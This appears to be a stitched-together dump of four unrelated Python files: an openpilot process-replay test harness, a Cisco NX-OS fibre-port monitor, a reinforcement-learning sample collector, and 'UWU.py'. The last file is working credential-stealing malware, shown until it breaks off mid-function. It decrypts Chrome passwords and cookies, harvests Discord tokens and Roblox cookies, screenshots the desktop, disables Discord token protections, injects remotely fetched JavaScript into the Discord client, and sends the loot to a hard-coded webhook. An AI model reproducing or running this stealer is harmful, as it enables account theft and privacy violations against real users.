#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
import signal
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from common.timeout import Timeout
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.car.car_helpers import get_car, interfaces
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
TIMEOUT = 15
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance', 'fake_pubsubmaster'])
def wait_for_event(evt):
if not evt.wait(TIMEOUT):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super().__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super().update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock, fingerprint):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock, fingerprint):
if fingerprint:
CarInterface, _, _ = interfaces[fingerprint]
CP = CarInterface.get_params(fingerprint)
else:
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def controlsd_rcv_callback(msg, CP, cfg, fsm):
# no sendcan until controlsd is initialized
socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
if "sendcan" in socks and fsm.frame < 2000:
socks.remove("sendcan")
return socks, len(socks) > 0
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaStates": [], "peripheralState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "ubloxRaw": [], "managerState": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=controlsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan", "longitudinalPlan"],
"carState": [], "controlsState": [], "radarState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay", "longitudinalPlan.solverExecutionTime", "lateralPlan.solverExecutionTime"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=False,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
fake_pubsubmaster=False,
),
]
def replay_process(cfg, lr, fingerprint=None):
if cfg.fake_pubsubmaster:
return python_replay_process(cfg, lr, fingerprint)
else:
return cpp_replay_process(cfg, lr, fingerprint)
def setup_env():
params = Params()
params.clear_all()
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("Passive", False)
params.put_bool("CommunityFeaturesToggle", True)
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ["SIMULATION"] = "1"
def python_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
setup_env()
# TODO: remove after getting new route for civic & accord
migration = {
"HONDA CIVIC 2016 TOURING": "HONDA CIVIC 2016",
"HONDA ACCORD 2018 SPORT 2T": "HONDA ACCORD 2018",
"HONDA ACCORD 2T 2018": "HONDA ACCORD 2018",
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
if fingerprint is not None:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = fingerprint
else:
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
Params().put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock, fingerprint)
CP = car.CarParams.from_bytes(Params().get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs, disable=CI):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg().as_builder()
m.logMonoTime = msg.logMonoTime
m = m.as_reader()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
log_msgs = []
setup_env()
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
try:
with Timeout(TIMEOUT):
while not all(pm.all_readers_updated(s) for s in cfg.pub_sub.keys()):
time.sleep(0)
# Make sure all subscribers are connected
sockets = {s: messaging.sub_sock(s, timeout=2000) for s in sub_sockets}
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for i, msg in enumerate(tqdm(pub_msgs, disable=False)):
pm.send(msg.which(), msg.as_builder())
resp_sockets = cfg.pub_sub[msg.which()] if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is None:
print(f"Warning, no response received {i}")
else:
response = response.as_builder()
response.logMonoTime = msg.logMonoTime
response = response.as_reader()
log_msgs.append(response)
if not len(resp_sockets): # We only need to wait if we didn't already wait for a response
while not pm.all_readers_updated(msg.which()):
time.sleep(0)
finally:
managed_processes[cfg.proc_name].signal(signal.SIGKILL)
managed_processes[cfg.proc_name].stop()
return log_msgs
|
FibrePorts.py
|
#!/isan/bin/nxpython
# -*- coding: utf-8 -*-
"""
Copyright (c) 2019 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.0 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied.
"""
__author__ = "Simon Hart <sihart@cisco.com>"
################################################################
# File: FibrePorts.py
#
# Description:
# Application will look at recieved power levels on sfp's
# that have Digital Optical Monitoring, and will report back
# if power is being received, and thus whether fibre is connected
##################################################################
import time
import threading
import sys
import json
import re
from collections import OrderedDict
### Imports NX-OS SDK package
import nx_sdk_py
###
# Timer thread to showcase that native python threads can also
# run along with sdkThread which is also listening for NX-OS
# specific events. tmsg.event is just generating a log every 2 minutes
# to report that the application is running. Could turn this off if required
###
def timerThread(name, val):
global cliP, sdk, tmsg
count = 0
while True:
count += 1
if sdk and cliP:
print "timer kicked - sdk"
else:
print "timer ticked - not sdk"
if tmsg:
### Logs a event log everytime timer is kicked once tmsg
### is initialized.
tmsg.event("FibrePorts Timer ticked - %d" % count)
time.sleep(120)
# RegEx search string to eliminate vlan, portchannel interfaces etc.
ethernet = re.compile(r'Ethernet\d.\d*')
# Configurable global variable for received power levels in db.
POWERLEVEL = -30
###
# Inherit from the NxCmdHandler class, define the application
# callback in 'postCliCb'. Handler Callback for Custom Cli execution.
# Returns True if the action was successful. False incase of failure.
###
class pyCmdHandler(nx_sdk_py.NxCmdHandler):
def postCliCb(self, clicmd):
### To access the global Cli Parser Obj
global cliP, ethernet, POWERLEVEL
if "show_fibre" in clicmd.getCmdName():
resp_str1 = cliP.execShowCmd("show interface brief", nx_sdk_py.R_JSON)
resp_str2 = cliP.execShowCmd("show interface transceiver details", nx_sdk_py.R_JSON)
intbriefJs = json.loads(resp_str1)
inttransJs = json.loads(resp_str2)
intdict = {}
#Search for only ethernet interafaces, add state to new dictionary
# intdict
for i in intbriefJs["TABLE_interface"]["ROW_interface"]:
mo = (ethernet.search(i["interface"]))
try:
if mo.group() == i["interface"]:
intdict[i["interface"]] = {"state": i["state"]}
except AttributeError:
pass
#Add sfp, name, and power levels to dictionary intdict
for i in inttransJs["TABLE_interface"]["ROW_interface"]:
intdict[i["interface"]].update({"sfp": i["sfp"]})
try:
intdict[i["interface"]].update({"name": i["name"]})
intdict[i["interface"]].update({"type": i["type"]})
except KeyError:
#pass
intdict[i["interface"]].update({"name": "n\\a"})
intdict[i["interface"]].update({"type": "n\\a"})
# try:
# intdict[i["interface"]].update({"name": i["name"]})
# except KeyError:
# pass
try:
if i["rx_pwr"]:
if float(i["rx_pwr"]) > POWERLEVEL:
print i["rx_pwr"]
intdict[i["interface"]].update({"fibre": "FIBRE PRESENT"})
intdict[i["interface"]].update({"rx_pwr": i["rx_pwr"]})
else:
intdict[i["interface"]].update({"fibre": "No Fibre"})
intdict[i["interface"]].update({"rx_pwr": i["rx_pwr"]})
except KeyError:
intdict[i["interface"]].update({"fibre": "No Fibre"})
intdict[i["interface"]].update({"rx_pwr": 'N/A'})
#Print out titles
clicmd.printConsole('{:17}{:10}{:17}{:17}{:14}{:17}{:17}'.format('INTERFACE', 'STATE', 'SFP', 'FIBRE', 'POWER', 'NAME', 'TYPE\n'))
#clicmd.printConsole('{:17}{:10}{:17}{:17}{:14}'.format('INTERFACE', 'STATE', 'SFP', 'FIBRE', 'POWER\n'))
clicmd.printConsole('-' * 110)
clicmd.printConsole('\n')
#Order dictionary
ordintdict = OrderedDict(sorted(intdict.items()))
#Print out each of
for k, v in ordintdict.items():
clicmd.printConsole("{:17}{:10}{:17}{:17}{:14}{:17}{:17}\n".format(k, v["state"], v["sfp"], v["fibre"], v["rx_pwr"], v["name"],v["type"]))
#clicmd.printConsole("{:17}{:10}{:17}{:17}{:14}\n".format(k, v["state"], v["sfp"], v["fibre"], v["rx_pwr"]))
return True
### Perform all SDK related initializations in one thread.
### All SDK related activities happen here, while the main thread
### may continue to do other work. The call to startEventLoop will
### block until we break out of it by calling stopEventLoop.
def sdkThread(name, val):
global cliP, sdk, event_hdlr, tmsg, int_attr
###
# getSdkInst is the first step for any custom Application
# wanting to gain access to NXOS Infra. Without this
# NXOS infra cannot be used.
#
# NOTE:
# Perform all SDK related initializations and startEventLoop in one
# thread. The call to startEventLoop will block the thread until we
# break out of it by calling stopEventLoop.
#
# Perform other actions in a different thread.
###
sdk = nx_sdk_py.NxSdk.getSdkInst(len(sys.argv), sys.argv)
if not sdk:
return
### Set a short Application description.
sdk.setAppDesc('FibrePorts Python App')
###
# To Create & Manage Custom syslogs one must do
# getTracer() which loads the plugin to NXOS Syslog
# Infra Functionalities.
###
tmsg = sdk.getTracer()
### To log some Trace events
tmsg.event("[%s] Started service" % sdk.getAppName())
###
# To Create & Manage Custom CLI commands one must do
# getCliParser() which loads the plugin to NXOS CLI
# Infra Functionalities.
###
cliP = sdk.getCliParser()
### Construct Custom show For Fibre ports
nxcmd = cliP.newShowCmd("show_fibre", "ports")
nxcmd.updateKeyword("ports", "fibre or not")
###
# Add the command callback Handler.
# When the respective CLI commands gets configured
# the overloaded postCliCb callback will be instantiated.
###
mycmd = pyCmdHandler()
cliP.setCmdHandler(mycmd)
###
# This is important as it Adds the constructed custom configs
# to NXOS CLI Parse tree.
###
cliP.addToParseTree()
###
# startEventLoop will block the thread until we break out
# of it by calling stopEventLoop.
###
sdk.startEventLoop()
### Got here either by calling stopEventLoop() or when App
### is removed from VSH.
tmsg.event("Service Quitting...!")
### [Required] Needed for graceful exit.
nx_sdk_py.NxSdk.__swig_destroy__(sdk)
### main thread
### Global Variables
cliP = 0
sdk = 0
tmsg = 0
### create a new sdkThread to setup SDK service and handle events.
sdk_thread = threading.Thread(target=sdkThread, args=("sdkThread", 0))
sdk_thread.start()
timer_thread = threading.Thread(target=timerThread, args=("timerThread", 0))
timer_thread.daemon = True
###
# Starting timer thread. Start it after sdkThread is started so that
# any SDK specific APIs will work without any issues in timerThread.
###
timer_thread.start()
### Main thread is blocked until sdkThread exits. This keeps the
### App running and listening to NX-OS events.
sdk_thread.join()
|
agent.py
|
import multiprocessing
from utils.replay_memory import Memory
from utils.torch import *
import math
import time
import os
os.environ["OMP_NUM_THREADS"] = "1"
def collect_samples(pid, queue, env, policy, custom_reward,
mean_action, render, running_state, min_batch_size):
if pid > 0:
torch.manual_seed(torch.randint(0, 5000, (1,)) * pid)
if hasattr(env, 'np_random'):
env.np_random.seed(env.np_random.randint(5000) * pid)
if hasattr(env, 'env') and hasattr(env.env, 'np_random'):
env.env.np_random.seed(env.env.np_random.randint(5000) * pid)
log = dict()
memory = Memory()
num_steps = 0
total_reward = 0
min_reward = 1e6
max_reward = -1e6
total_c_reward = 0
min_c_reward = 1e6
max_c_reward = -1e6
num_episodes = 0
while num_steps < min_batch_size:
state = env.reset()
if running_state is not None:
state = running_state(state)
reward_episode = 0
for t in range(10000):
state_var = tensor(state).unsqueeze(0)
with torch.no_grad():
if mean_action:
action = policy(state_var)[0][0].numpy()
else:
action = policy.select_action(state_var)[0].numpy()
action = int(action) if policy.is_disc_action else action.astype(np.float64)
next_state, reward, done, _ = env.step(action)
reward_episode += reward
if running_state is not None:
next_state = running_state(next_state)
if custom_reward is not None:
reward = custom_reward(state, action)
total_c_reward += reward
min_c_reward = min(min_c_reward, reward)
max_c_reward = max(max_c_reward, reward)
mask = 0 if done else 1
memory.push(state, action, mask, next_state, reward)
if render:
env.render()
if done:
break
state = next_state
# log stats
num_steps += (t + 1)
num_episodes += 1
total_reward += reward_episode
min_reward = min(min_reward, reward_episode)
max_reward = max(max_reward, reward_episode)
log['num_steps'] = num_steps
log['num_episodes'] = num_episodes
log['total_reward'] = total_reward
log['avg_reward'] = total_reward / num_episodes
log['max_reward'] = max_reward
log['min_reward'] = min_reward
if custom_reward is not None:
log['total_c_reward'] = total_c_reward
log['avg_c_reward'] = total_c_reward / num_steps
log['max_c_reward'] = max_c_reward
log['min_c_reward'] = min_c_reward
if queue is not None:
queue.put([pid, memory, log])
else:
return memory, log
def merge_log(log_list):
log = dict()
log['total_reward'] = sum([x['total_reward'] for x in log_list])
log['num_episodes'] = sum([x['num_episodes'] for x in log_list])
log['num_steps'] = sum([x['num_steps'] for x in log_list])
log['avg_reward'] = log['total_reward'] / log['num_episodes']
log['max_reward'] = max([x['max_reward'] for x in log_list])
log['min_reward'] = min([x['min_reward'] for x in log_list])
if 'total_c_reward' in log_list[0]:
log['total_c_reward'] = sum([x['total_c_reward'] for x in log_list])
log['avg_c_reward'] = log['total_c_reward'] / log['num_steps']
log['max_c_reward'] = max([x['max_c_reward'] for x in log_list])
log['min_c_reward'] = min([x['min_c_reward'] for x in log_list])
return log
class Agent:
def __init__(self, env, policy, device, custom_reward=None, running_state=None, num_threads=1):
self.env = env
self.policy = policy
self.device = device
self.custom_reward = custom_reward
self.running_state = running_state
self.num_threads = num_threads
def collect_samples(self, min_batch_size, mean_action=False, render=False):
t_start = time.time()
to_device(torch.device('cpu'), self.policy)
thread_batch_size = int(math.floor(min_batch_size / self.num_threads))
queue = multiprocessing.Queue()
workers = []
for i in range(self.num_threads-1):
worker_args = (i+1, queue, self.env, self.policy, self.custom_reward, mean_action,
False, self.running_state, thread_batch_size)
workers.append(multiprocessing.Process(target=collect_samples, args=worker_args))
for worker in workers:
worker.start()
memory, log = collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, thread_batch_size)
worker_logs = [None] * len(workers)
worker_memories = [None] * len(workers)
for _ in workers:
pid, worker_memory, worker_log = queue.get()
worker_memories[pid - 1] = worker_memory
worker_logs[pid - 1] = worker_log
for worker_memory in worker_memories:
memory.append(worker_memory)
batch = memory.sample()
if self.num_threads > 1:
log_list = [log] + worker_logs
log = merge_log(log_list)
to_device(self.device, self.policy)
t_end = time.time()
log['sample_time'] = t_end - t_start
log['action_mean'] = np.mean(np.vstack(batch.action), axis=0)
log['action_min'] = np.min(np.vstack(batch.action), axis=0)
log['action_max'] = np.max(np.vstack(batch.action), axis=0)
return batch, log
|
UWU.py
|
import os
import json
import shutil
import base64
import psutil
import sqlite3
import zipfile
import requests
import subprocess
from threading import Thread
from PIL import ImageGrab
from win32crypt import CryptUnprotectData
from re import findall, match
from Crypto.Cipher import AES
config = {
'webhook': "https://discord.com/api/webhooks/959127242942865429/TQHg_QfHlCviVT5ixVpf0-93BZ10fA_yFrrS3pyT0rl8WtuLH5HHETEcU8S67MRkmUkN" #replace https://discord.com/api/webhooks/959127242942865429/TQHg_QfHlCviVT5ixVpf0-93BZ10fA_yFrrS3pyT0rl8WtuLH5HHETEcU8S67MRkmUkN with your webhook
}
class functions(object):
def getHeaders(self, token:str=None, content_type="application/json") -> dict:
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def get_master_key(self, path) -> str:
with open(path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
def decrypt_val(self, buff, master_key) -> str:
try:
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
except Exception:
return "Failed to decrypt password"
class Hazard_Token_Grabber_V2(functions):
def __init__(self):
super().__init__()
self.webhook = config.get('webhook')
self.baseurl = "https://discord.com/api/v9/users/@me"
self.appdata = os.getenv("localappdata")
self.roaming = os.getenv("appdata")
self.tempfolder = os.getenv("temp")+"\\Hazard_Token_Grabber_V2"
self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"
self.encrypted_regex = r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*"
try:
os.mkdir(os.path.join(self.tempfolder))
except Exception:
pass
self.tokens = []
self.robloxcookies = []
self.files = ""
self.bypassBetterDiscord()
self.bypassTokenProtector()
if not os.path.exists(self.appdata+'\\Google\\Chrome\\User Data') or not os.path.exists(self.appdata+'\\Google\\Chrome\\User Data\\Local State'):
self.files += f"{os.getlogin()} doesn't have google installed\n"
else:
self.grabPassword()
self.grabCookies()
Thread(target=self.screenshot).start()
Thread(target=self.killDiscord).start()
self.grabTokens()
self.neatifyTokens()
self.grabRobloxCookie()
for i in ["Google Passwords.txt", "Google Cookies.txt", "Discord Info.txt", "Discord backupCodes.txt"]:
if os.path.exists(self.tempfolder+os.sep+i):
with open(self.tempfolder+os.sep+i, "r", encoding="cp437") as ff:
x = ff.read()
if not x:
with open(self.tempfolder+os.sep+i, "w", encoding="cp437") as f:
f.write("Made by Rdimo | https://github.com/Rdimo/Hazard-Token-Grabber-V2\n\n")
with open(self.tempfolder+os.sep+i, "a", encoding="cp437") as fp:
fp.write(x+"\n\nMade by Rdimo | https://github.com/Rdimo/Hazard-Token-Grabber-V2")
else:
try:
os.remove(self.tempfolder+os.sep+i)
except Exception:
print("ok")
self.SendInfo()
self.injector()
shutil.rmtree(self.tempfolder)
def checkToken(self, tkn):
try:
r = requests.get(self.baseurl, headers=self.getHeaders(tkn))
if r.status_code == 200 and tkn not in self.tokens:
self.tokens.append(tkn)
except requests.exceptions:
pass
def injector(self):
for _dir in os.listdir(self.appdata):
if 'discord' in _dir.lower():
for __dir in os.listdir(os.path.abspath(self.appdata+os.sep+_dir)):
if match(r'app-(\d*\.\d*)*', __dir):
abspath = os.path.abspath(self.appdata+os.sep+_dir+os.sep+__dir)
f = requests.get("https://raw.githubusercontent.com/Rdimo/Discord-Injection/master/injection.js").text.replace("%WEBHOOK%", self.webhook)
with open(abspath+'\\modules\\discord_desktop_core-2\\discord_desktop_core\\index.js', 'w', encoding="utf-8") as indexFile:
indexFile.write(f)
os.startfile(abspath+os.sep+_dir+'.exe')
def killDiscord(self):
for proc in psutil.process_iter():
if any(procstr in proc.name().lower() for procstr in\
['discord', 'discordtokenprotector', 'discordcanary', 'discorddevelopment', 'discordptb']):
try:
proc.kill()
except psutil.NoSuchProcess:
pass
def bypassTokenProtector(self):
#fucks up the discord token protector by https://github.com/andro2157/DiscordTokenProtector
tp = f"{self.roaming}\\DiscordTokenProtector\\"
config = tp+"config.json"
for i in ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]:
try:
os.remove(tp+i)
except Exception:
pass
try:
with open(config) as f:
item = json.load(f)
item['auto_start'] = False
item['auto_start_discord'] = False
item['integrity'] = False
item['integrity_allowbetterdiscord'] = False
item['integrity_checkexecutable'] = False
item['integrity_checkhash'] = False
item['integrity_checkmodule'] = False
item['integrity_checkscripts'] = False
item['integrity_checkresource'] = False
item['integrity_redownloadhashes'] = False
item['iterations_iv'] = 364
item['iterations_key'] = 457
item['version'] = 69420
with open(config, 'w') as f:
json.dump(item, f, indent=2, sort_keys=True)
with open(config, 'a') as f:
f.write("\n\n//Rdimo just shit on this token protector | https://github.com/Rdimo")
except Exception:
pass
def bypassBetterDiscord(self):
bd = self.roaming+"\\BetterDiscord\\data\\betterdiscord.asar"
if os.path.exists(bd):
x = "api/webhooks"
with open(bd, 'r', encoding="cp437", errors='ignore') as f:
txt = f.read()
content = txt.replace(x, 'RdimoTheGoat')
with open(bd, 'w', newline='', encoding="cp437", errors='ignore') as f:
f.write(content)
def getProductValues(self):
try:
wkey = subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault", creationflags=0x08000000).decode().rstrip()
except:
wkey = "N/A (Likely Pirated)"
try:
productName = subprocess.check_output(r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName", creationflags=0x08000000).decode().rstrip()
except:
productName = "N/A"
return [productName, wkey]
def grabPassword(self):
master_key = self.get_master_key(self.appdata+'\\Google\\Chrome\\User Data\\Local State')
login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
try:
shutil.copy2(login_db, "Loginvault.db")
except Exception:
pass
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
with open(self.tempfolder+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
try:
cursor.execute("SELECT action_url, username_value, password_value FROM logins")
for r in cursor.fetchall():
url = r[0]
username = r[1]
encrypted_password = r[2]
decrypted_password = self.decrypt_val(encrypted_password, master_key)
